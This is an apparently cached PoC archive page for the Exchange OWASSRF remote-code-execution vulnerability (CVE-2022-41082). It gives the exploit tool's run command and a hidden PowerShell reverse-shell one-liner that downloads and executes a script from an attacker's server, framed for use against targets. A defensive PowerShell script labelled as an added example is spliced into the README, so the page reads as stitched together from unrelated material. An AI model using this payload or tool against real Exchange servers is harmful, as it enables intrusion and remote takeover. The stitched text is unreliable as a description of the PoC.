PoC details: 74af2085320b7013106e48fc1b54bf09466a99aa

Source
Related vulnerability
Title: Microsoft Exchange Server code issue vulnerability (CVE-2022-41082)
Description: Microsoft Exchange Server is an e-mail server product from Microsoft, a US company. It provides mail access, storage and forwarding, voice mail, mail filtering and related features. Microsoft Exchange Server contains a security vulnerability that an attacker can exploit to execute code remotely.
Description
CVE-2022-41082-poc
Introduction
# CVE-2022-41082

This repository contains a proof-of-concept (PoC) tool for exploiting the **OWASSRF** vulnerability (CVE-2022-41082) in Microsoft Exchange servers. The exploit allows attackers to execute arbitrary commands on the server, potentially compromising the system.

## Overview

The tool leverages an **OWASSRF** vulnerability to bypass authentication and gain remote code execution (RCE) on an Exchange server. By exploiting this vulnerability, an attacker can execute commands as if they were an authenticated user, leading to severe security implications.

### How It Works

1. **Authentication Bypass**: The tool connects to the target Exchange server, bypassing authentication mechanisms using crafted requests.
2. **Remote Code Execution**: After successfully logging in, the tool opens a session that allows command execution on the Exchange server.
3. **Executing Commands**: Users can specify commands to be executed on the server, allowing for various actions, including file manipulation, network operations, or establishing reverse shells.

### Important Note

When using this tool, **please** ensure that you keep the same session of the Exchange Management Shell open. It is crucial to enable Remote PowerShell access for at least one user after disabling it for others. Otherwise, you may lose Management Shell access on all Exchange servers.

## Commands for Managing PowerShell Access

Here are some useful PowerShell commands to check and manage who has access:

### Check PowerShell Access

To see which users have Remote PowerShell access and which do not, run:

```powershell
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
```

### Disable PowerShell Access for All Users

**Warning:** Be careful not to close the Exchange Management Shell window unless you add at least one user back.

You can disable PowerShell access for all users using the following commands:

```powershell
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}
```

Or use a single command to achieve the same result:

```powershell
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false
```

### Re-enabling Access for a Specific User

To grant Remote PowerShell access to a specific user, run:

```powershell
Set-User "guest" -RemotePowerShellEnabled $true
```

### Workaround for Losing PowerShell Access

If you lose PowerShell access for all users, you can create a new mailbox user with administrator rights. This new user will bypass the policies applied, allowing you to use the Exchange Management Shell again.
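The three steps above (check who has access, disable it for everyone, re-enable it for one account) are easy to get wrong in exactly the way the note warns about: if the "disable all" step runs before the "re-enable one" step and the shell is closed, nobody can reach the Exchange Management Shell. The script below is an added example, not code from this repository; it orders the steps safely and refuses to finish with zero enabled accounts. It uses only the `Get-User`/`Set-User` cmdlets and the `-RemotePowerShellEnabled` parameter already shown in this README; `$BreakGlass` is a placeholder account name you supply, and the CSV path is an assumption.

```powershell
# Added example (not part of the PoC repository): guarded version of
# "disable Remote PowerShell for all users, keep one break-glass account".
# Assumes it is run from an Exchange Management Shell session that stays open.
param(
    [Parameter(Mandatory = $true)]
    [string]$BreakGlass,   # placeholder: the one account that must keep access
    [switch]$WhatIf        # dry run: report what would change, change nothing
)

# 1. Confirm the break-glass account exists before touching anyone else.
$keep = Get-User -Identity $BreakGlass -ErrorAction Stop

# 2. Snapshot the current state so the change can be audited and reverted.
$before = Get-User -ResultSize Unlimited |
    Select-Object Name, DistinguishedName, RemotePowerShellEnabled
$stamp = Get-Date -Format 'yyyyMMdd-HHmmss'
$before | Export-Csv -NoTypeInformation -Path ".\rps-before-$stamp.csv"  # assumed path

# 3. Enable the break-glass account FIRST, in this same session, so there is
#    never a moment with zero Remote PowerShell users.
if (-not $keep.RemotePowerShellEnabled) {
    Set-User -Identity $keep.DistinguishedName -RemotePowerShellEnabled $true -WhatIf:$WhatIf
}

# 4. Disable everyone else who currently has access.
$targets = $before | Where-Object {
    $_.RemotePowerShellEnabled -and $_.DistinguishedName -ne $keep.DistinguishedName
}
foreach ($u in $targets) {
    Set-User -Identity $u.DistinguishedName -RemotePowerShellEnabled $false -WhatIf:$WhatIf
}

# 5. Verify before the operator is allowed to walk away: the break-glass
#    account must still be enabled. Fail loudly rather than lock everyone out.
$after = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$stillEnabled = $after | Where-Object DistinguishedName -eq $keep.DistinguishedName
if (-not $WhatIf -and -not $stillEnabled) {
    throw "Break-glass account '$BreakGlass' is not Remote PowerShell enabled; re-enable it from this session before closing it."
}
"Remote PowerShell remains enabled for:"
$after | Select-Object Name, DistinguishedName
```

Run it once with `-WhatIf` to see the list of accounts that would be disabled, then without it; the `rps-before-*.csv` file it writes is the record you need if access has to be restored account by account later.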

## Using the PoC Tool

### Requirements

- Python 3.x
- Required libraries (install with `pip install -r requirements.txt` if necessary)

### Running the Tool

To execute the PoC tool, run the following command:

```bash
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>
```

Replace `<target_IP>`, `<username>`, `<password>`, and `<command_file>` with your specific values.

### Example Command for Reverse Shell

You can modify the command in your `cmd_file` to include a reverse shell payload. For example:

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"
```

This command will download and execute a PowerShell script from your server, giving you a reverse shell.

## References

For more information about the OWASSRF vulnerability and the PoC code, see:

- [OWASSRF CVE-2022-41082 PoC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC)
- https://www.youtube.com/watch?v=c2DZYP6jc7g
File snapshot

```text
[4.0K] /data/pocs/74af2085320b7013106e48fc1b54bf09466a99aa
├── [5.2K] poc.py
├── [3.7K] README.md
└── [   9] requirements.txt

0 directories, 3 files
```

Cached for you by the Shenlong bot.
Notes
    1. Prefer accessing the PoC through its original source.
    2. If the source is gone or unreachable, send an e-mail to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.